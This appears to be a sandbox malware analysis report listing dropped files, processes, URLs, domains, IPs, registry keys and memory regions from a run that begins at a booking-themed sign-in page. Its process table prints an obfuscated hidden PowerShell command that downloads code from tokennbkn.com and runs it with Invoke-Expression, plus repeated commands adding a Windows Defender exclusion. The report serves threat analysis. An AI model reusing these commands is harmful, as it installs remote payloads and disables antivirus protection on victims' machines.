Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cpquur0.r5r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_230rjni1.eih.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lumgk3i.3mp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52vmgvhi.fv3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajn4fxo3.c5k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzplew4r.ntg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chfxxijg.cdy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_codlz1qj.o0m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjrvdq4u.ooo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpflaurx.lmm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0oupswy.mlt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hov5lo0a.gkw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ip0zvyun.aq0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwwd1vwj.fs2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myn0voxd.5eb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prl24suv.ztn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0iqqdof.xiq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w322hqhd.pmt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0DCUMHVA3F8COHK91CGJ.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4IO0JB48GH50KGE9OH30.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\522UUHUP4G8Y9P3D9OQD.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IYTCJTPHM30BI644DSDL.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W42N5RY6F14O79SYYWBK.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF48352b.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF485dc1.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF488231.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF489869.TMP
(copy)
|
data
|
dropped
|
||
|
Chrome Cache Entry: 323
|
ASCII text, with very long lines (10039), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 324
|
ASCII text, with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 325
|
PNG image data, 70 x 65, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 326
|
PNG image data, 70 x 65, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 327
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 328
|
PNG image data, 2 x 2, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 329
|
PNG image data, 2 x 2, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 330
|
ASCII text, with very long lines (48827)
|
downloaded
|
||
|
Chrome Cache Entry: 331
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 332
|
ASCII text, with very long lines (65447)
|
downloaded
|
There are 31 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
 |
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2120,i,9730610684650128976,8350997037842141116,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /K poweRshEll -w h /c "$e"vsg"1 = 't"okenn"bkn.c"o"m';$vtl"h"7 = I"nvo"ke"-"RestM"ethod" -Uri $e"vs"g1;In"vo"ke-"E"xpr"e"s"s"ion
$v"t"lh7"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
poweRshEll -w h /c "$e"vsg"1 = 't"okenn"bkn.c"o"m';$vtl"h"7 = I"nvo"ke"-"RestM"ethod" -Uri $e"vs"g1;In"vo"ke-"E"xpr"e"s"s"ion
$v"t"lh7"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $ErrorActionPreference='Stop';
Add-MpPreference -ExclusionPath 'C:\Windows\Temp'
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $ErrorActionPreference='Stop';
Add-MpPreference -ExclusionPath 'C:\Windows\Temp'
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $ErrorActionPreference='Stop';
Add-MpPreference -ExclusionPath 'C:\Windows\Temp'
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $ErrorActionPreference='Stop';
Add-MpPreference -ExclusionPath 'C:\Windows\Temp'
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $ErrorActionPreference='Stop';
Add-MpPreference -ExclusionPath 'C:\Windows\Temp'
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://tokennbkn.com/
|
45.141.101.104
|
||
|
http://crl.micro5
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.micro7
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a.nel.cloudflare.com
|
35.190.80.1
|
||
|
code.jquery.com
|
151.101.2.137
|
||
|
booking.home-extranet.com
|
172.67.173.72
|
||
|
challenges.cloudflare.com
|
104.18.95.41
|
||
|
www.google.com
|
142.250.114.147
|
||
|
tokennbkn.com
|
45.141.101.104
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.114.147
|
www.google.com
|
United States
|
||
|
172.67.173.72
|
booking.home-extranet.com
|
United States
|
||
|
104.18.94.41
|
unknown
|
United States
|
||
|
104.18.95.41
|
challenges.cloudflare.com
|
United States
|
||
|
192.168.2.6
|
unknown
|
unknown
|
||
|
151.101.2.137
|
code.jquery.com
|
United States
|
||
|
45.141.101.104
|
tokennbkn.com
|
Russian Federation
|
||
|
104.21.96.53
|
unknown
|
United States
|
||
|
35.190.80.1
|
a.nel.cloudflare.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8730000
|
heap
|
page read and write
|
||
|
46E4000
|
trusted library allocation
|
page read and write
|
||
|
752E000
|
stack
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
70DF000
|
stack
|
page read and write
|
||
|
80A0000
|
heap
|
page read and write
|
||
|
83AE000
|
stack
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
5BB4000
|
trusted library allocation
|
page read and write
|
||
|
2A36000
|
heap
|
page read and write
|
||
|
407B000
|
stack
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
6DA5000
|
heap
|
page execute and read and write
|
||
|
7EF18000
|
trusted library allocation
|
page execute and read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
872C000
|
heap
|
page read and write
|
||
|
4AF0000
|
heap
|
page readonly
|
||
|
6F07000
|
heap
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
465A000
|
trusted library allocation
|
page execute and read and write
|
||
|
6945000
|
heap
|
page execute and read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
62E4000
|
trusted library allocation
|
page read and write
|
||
|
6DAE000
|
stack
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
354B000
|
heap
|
page read and write
|
||
|
826A000
|
heap
|
page read and write
|
||
|
72A0000
|
heap
|
page execute and read and write
|
||
|
7252000
|
heap
|
page read and write
|
||
|
6F33000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
5410000
|
heap
|
page execute and read and write
|
||
|
47DE000
|
stack
|
page read and write
|
||
|
25EB000
|
stack
|
page read and write
|
||
|
47E8000
|
trusted library allocation
|
page read and write
|
||
|
40D0000
|
heap
|
page read and write
|
||
|
421B000
|
stack
|
page read and write
|
||
|
5BA7000
|
trusted library allocation
|
page read and write
|
||
|
58BE000
|
trusted library allocation
|
page read and write
|
||
|
5BC4000
|
trusted library allocation
|
page read and write
|
||
|
5090000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E34000
|
heap
|
page read and write
|
||
|
40BE000
|
stack
|
page read and write
|
||
|
8AB0000
|
trusted library allocation
|
page read and write
|
||
|
4BA4000
|
trusted library allocation
|
page read and write
|
||
|
6E70000
|
trusted library allocation
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
6A0E000
|
stack
|
page read and write
|
||
|
7DD0000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
5380000
|
trusted library allocation
|
page read and write
|
||
|
815A000
|
trusted library allocation
|
page read and write
|
||
|
2F96000
|
heap
|
page read and write
|
||
|
3FFE000
|
stack
|
page read and write
|
||
|
809E000
|
stack
|
page read and write
|
||
|
46E0000
|
trusted library allocation
|
page read and write
|
||
|
870C000
|
heap
|
page read and write
|
||
|
4665000
|
trusted library allocation
|
page execute and read and write
|
||
|
47E0000
|
trusted library allocation
|
page read and write
|
||
|
27DB000
|
heap
|
page read and write
|
||
|
58E4000
|
trusted library allocation
|
page read and write
|
||
|
7ED6000
|
heap
|
page read and write
|
||
|
6E80000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
7F15000
|
heap
|
page read and write
|
||
|
508C000
|
stack
|
page read and write
|
||
|
7E72000
|
heap
|
page read and write
|
||
|
6940000
|
heap
|
page execute and read and write
|
||
|
6CEE000
|
stack
|
page read and write
|
||
|
763E000
|
stack
|
page read and write
|
||
|
292F000
|
stack
|
page read and write
|
||
|
8776000
|
heap
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
58C7000
|
trusted library allocation
|
page read and write
|
||
|
528C000
|
trusted library allocation
|
page read and write
|
||
|
7EE3000
|
heap
|
page read and write
|
||
|
2F6B000
|
stack
|
page read and write
|
||
|
4BB9000
|
trusted library allocation
|
page read and write
|
||
|
70A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BA0000
|
trusted library allocation
|
page read and write
|
||
|
4AEE000
|
stack
|
page read and write
|
||
|
727D000
|
heap
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
3071000
|
heap
|
page read and write
|
||
|
691E000
|
stack
|
page read and write
|
||
|
829E000
|
stack
|
page read and write
|
||
|
280F000
|
stack
|
page read and write
|
||
|
4730000
|
trusted library allocation
|
page read and write
|
||
|
23B0000
|
heap
|
page read and write
|
||
|
5566000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
4550000
|
heap
|
page read and write
|
||
|
58B5000
|
trusted library allocation
|
page read and write
|
||
|
68DB000
|
stack
|
page read and write
|
||
|
7A8D000
|
stack
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
3F9E000
|
stack
|
page read and write
|
||
|
62FC000
|
trusted library allocation
|
page read and write
|
||
|
479E000
|
stack
|
page read and write
|
||
|
866E000
|
stack
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
8724000
|
heap
|
page read and write
|
||
|
7ED8000
|
heap
|
page read and write
|
||
|
2FE7000
|
heap
|
page read and write
|
||
|
2AAD000
|
heap
|
page read and write
|
||
|
810E000
|
stack
|
page read and write
|
||
|
6E9D000
|
heap
|
page read and write
|
||
|
6F21000
|
heap
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
872B000
|
stack
|
page read and write
|
||
|
7E3C000
|
heap
|
page read and write
|
||
|
5BB0000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
heap
|
page read and write
|
||
|
4567000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
49DE000
|
stack
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
4A29000
|
trusted library allocation
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
72C1000
|
heap
|
page read and write
|
||
|
77FF000
|
heap
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
6EAC000
|
heap
|
page read and write
|
||
|
560E000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
heap
|
page execute and read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
3F2F000
|
stack
|
page read and write
|
||
|
8AFE000
|
stack
|
page read and write
|
||
|
835E000
|
stack
|
page read and write
|
||
|
8C89000
|
stack
|
page read and write
|
||
|
547E000
|
stack
|
page read and write
|
||
|
5B40000
|
trusted library allocation
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
504C000
|
stack
|
page read and write
|
||
|
8796000
|
heap
|
page read and write
|
||
|
28A0000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
6BBE000
|
stack
|
page read and write
|
||
|
80E0000
|
heap
|
page read and write
|
||
|
2E97000
|
stack
|
page read and write
|
||
|
70DF000
|
stack
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
2317000
|
stack
|
page read and write
|
||
|
7D70000
|
heap
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
6F45000
|
heap
|
page read and write
|
||
|
5150000
|
heap
|
page execute and read and write
|
||
|
805E000
|
stack
|
page read and write
|
||
|
281D000
|
heap
|
page read and write
|
||
|
61B8000
|
trusted library allocation
|
page read and write
|
||
|
755D000
|
stack
|
page read and write
|
||
|
23D0000
|
heap
|
page read and write
|
||
|
4B3D000
|
stack
|
page read and write
|
||
|
87E6000
|
heap
|
page read and write
|
||
|
4871000
|
trusted library allocation
|
page read and write
|
||
|
6F44000
|
heap
|
page read and write
|
||
|
7F01000
|
heap
|
page read and write
|
||
|
2A3B000
|
heap
|
page read and write
|
||
|
4AFE000
|
stack
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
3346000
|
heap
|
page read and write
|
||
|
539D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8242000
|
heap
|
page read and write
|
||
|
7EE4000
|
heap
|
page read and write
|
||
|
4F58000
|
trusted library allocation
|
page read and write
|
||
|
2FAA000
|
stack
|
page read and write
|
||
|
44BE000
|
stack
|
page read and write
|
||
|
4E8E000
|
trusted library allocation
|
page read and write
|
||
|
23AF000
|
stack
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
51B1000
|
trusted library allocation
|
page read and write
|
||
|
34FE000
|
stack
|
page read and write
|
||
|
3574000
|
heap
|
page read and write
|
||
|
8728000
|
heap
|
page read and write
|
||
|
5394000
|
trusted library allocation
|
page read and write
|
||
|
725A000
|
heap
|
page read and write
|
||
|
75A0000
|
heap
|
page execute and read and write
|
||
|
7821000
|
heap
|
page read and write
|
||
|
722B000
|
stack
|
page read and write
|
||
|
3544000
|
heap
|
page read and write
|
||
|
338F000
|
stack
|
page read and write
|
||
|
3387000
|
heap
|
page read and write
|
||
|
7D2D000
|
stack
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7220000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FD4000
|
heap
|
page read and write
|
||
|
7413000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
4A1F000
|
stack
|
page read and write
|
||
|
54C1000
|
trusted library allocation
|
page read and write
|
||
|
6A10000
|
heap
|
page execute and read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
7F77000
|
heap
|
page read and write
|
||
|
4860000
|
heap
|
page read and write
|
||
|
6FC0000
|
heap
|
page execute and read and write
|
||
|
6EA0000
|
heap
|
page read and write
|
||
|
6A10000
|
heap
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page execute and read and write
|
||
|
500F000
|
stack
|
page read and write
|
||
|
3367000
|
heap
|
page read and write
|
||
|
8010000
|
trusted library allocation
|
page read and write
|
||
|
47CC000
|
stack
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
2A18000
|
heap
|
page read and write
|
||
|
7FA3000
|
heap
|
page read and write
|
||
|
33C7000
|
heap
|
page read and write
|
||
|
556A000
|
trusted library allocation
|
page read and write
|
||
|
6DA0000
|
heap
|
page execute and read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
4067000
|
heap
|
page read and write
|
||
|
694D000
|
stack
|
page read and write
|
||
|
2704000
|
heap
|
page read and write
|
||
|
68AC000
|
stack
|
page read and write
|
||
|
46ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
76FE000
|
stack
|
page read and write
|
||
|
7F05000
|
heap
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
4D84000
|
trusted library allocation
|
page read and write
|
||
|
4F60000
|
trusted library allocation
|
page read and write
|
||
|
715D000
|
stack
|
page read and write
|
||
|
7E30000
|
heap
|
page read and write
|
||
|
4633000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FDB000
|
stack
|
page read and write
|
||
|
6A15000
|
heap
|
page execute and read and write
|
||
|
40DE000
|
stack
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
7E83000
|
heap
|
page read and write
|
||
|
8B3E000
|
stack
|
page read and write
|
||
|
8AA0000
|
trusted library allocation
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
5390000
|
trusted library allocation
|
page read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
6189000
|
trusted library allocation
|
page read and write
|
||
|
82F1000
|
heap
|
page read and write
|
||
|
50B3000
|
trusted library allocation
|
page read and write
|
||
|
6F3A000
|
heap
|
page read and write
|
||
|
4A30000
|
trusted library allocation
|
page read and write
|
||
|
7EF60000
|
trusted library allocation
|
page execute and read and write
|
||
|
5B78000
|
trusted library allocation
|
page read and write
|
||
|
2A64000
|
heap
|
page read and write
|
||
|
7F18000
|
heap
|
page read and write
|
||
|
357C000
|
heap
|
page read and write
|
||
|
72A1000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
58DD000
|
trusted library allocation
|
page read and write
|
||
|
3528000
|
heap
|
page read and write
|
||
|
41DD000
|
stack
|
page read and write
|
||
|
5420000
|
trusted library allocation
|
page read and write
|
||
|
8218000
|
heap
|
page read and write
|
||
|
8C4E000
|
stack
|
page read and write
|
||
|
7FC80000
|
trusted library allocation
|
page execute and read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
77B2000
|
heap
|
page read and write
|
||
|
725A000
|
trusted library allocation
|
page read and write
|
||
|
81EE000
|
stack
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
7C9D000
|
stack
|
page read and write
|
||
|
70E0000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
82A1000
|
heap
|
page read and write
|
||
|
6F58000
|
heap
|
page read and write
|
||
|
318F000
|
stack
|
page read and write
|
||
|
4B51000
|
trusted library allocation
|
page read and write
|
||
|
767D000
|
stack
|
page read and write
|
||
|
4BCA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
4A00000
|
trusted library allocation
|
page read and write
|
||
|
23BE000
|
stack
|
page read and write
|
||
|
4740000
|
heap
|
page readonly
|
||
|
27A8000
|
heap
|
page read and write
|
||
|
51BB000
|
trusted library allocation
|
page read and write
|
||
|
831E000
|
stack
|
page read and write
|
||
|
7D8A000
|
trusted library allocation
|
page read and write
|
||
|
7EF78000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FAC000
|
heap
|
page read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
8250000
|
trusted library allocation
|
page execute and read and write
|
||
|
2936000
|
heap
|
page read and write
|
||
|
